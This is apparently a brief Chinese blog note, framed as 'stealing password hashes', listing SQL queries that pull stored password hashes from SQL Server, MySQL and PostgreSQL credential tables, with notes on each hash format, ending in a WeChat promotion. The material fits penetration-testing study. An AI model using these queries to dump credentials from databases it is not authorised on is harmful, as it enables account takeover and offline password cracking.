select name,password from syslogins
Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa'
窃取哈希口令:
SQL Server(sha1加密):
2000版本;
Select name,password from master.dbo.sysxlogins
2005版本:
Select password_hash from sys.sql_logins
2000版本
Hash格式:
0x0100(头部) + 8位salt +40位区分大小写的hash +40位不区分大小写的hash
2005版本
Hash格式:
0x0100(头部) +8位salt +40位区分大小写的hash
Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = ‘sa’ 强制转换为16进制,以免受格式影响
MySQL:
Select concat(user,password) from mysql.user
4.1版本前:select password(‘password’) 16字节hash
4.1版本后:41字节hash
PostgreSQL:
Select username,passwd from pg_shadow
Select rolname,rolpassword from pg_authid
Md5加密,hash=‘md5’+md5(password+username)
允许明文保存密码
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
参考资料:
https://wenku.baidu.com/view/5951285091c69ec3d5bbfd0a79563c1ec4dad713.html